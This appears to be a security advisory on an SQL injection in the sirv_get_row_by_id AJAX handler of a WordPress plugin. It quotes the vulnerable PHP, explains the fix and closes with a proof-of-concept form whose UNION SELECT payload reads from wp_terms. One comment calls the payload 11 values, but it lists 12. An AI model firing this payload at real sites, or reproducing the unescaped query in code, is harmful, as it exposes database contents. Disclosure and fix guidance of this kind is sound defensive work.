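The id request parameter (read as $_POST['row_id'] in the code below) is not escaped before it is interpolated into the SQL query. sirv_get_row_by_id() is accessible to every registered user, so the vulnerable query can be reached by any logged-in account.

$id = $_POST['row_id'];
$row = $wpdb->get_row("SELECT * FROM $table_name WHERE id = $id", ARRAY_A);
$row['images'] = unserialize($row['images']);
echo json_encode($row);

$id goes into the query unquoted and unvalidated. The fix is to cast it to an integer or bind it with $wpdb->prepare(), and to add a capability check and nonce verification to the AJAX handler. unserialize() is also applied to a column of whatever row the query returns, so it must not run on data that an injected query can influence.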
<!-- Proof-of-concept request from the advisory; "target" is a placeholder host. -->
<!-- The form posts to the WordPress AJAX endpoint; the "action" field names the sirv_get_row_by_id handler described above. -->
<form method="post" action="http://target/wp-admin/admin-ajax.php">
<!-- row_id is concatenated into "WHERE id = $id" without quoting, so the UNION SELECT below becomes part of the query. -->
<!-- Its result (name, slug and term_group from wp_terms) is echoed back by json_encode($row). -->
<!-- The 11 selected values presumably match the column count of the plugin table; confirm against the schema. -->
<!-- Detection: the query compares row_id with the id column, so any non-integer row_id sent with this action is worth rejecting and logging. -->
<input type="text" name="row_id" value="0 UNION SELECT 1, name,slug, term_group, 6, 7, 8, 9, 10, 11, 12 FROM wp_terms WHERE term_id=1">
<input type="text" name="action" value="sirv_get_row_by_id">
<input type="submit" value="Send">
</form>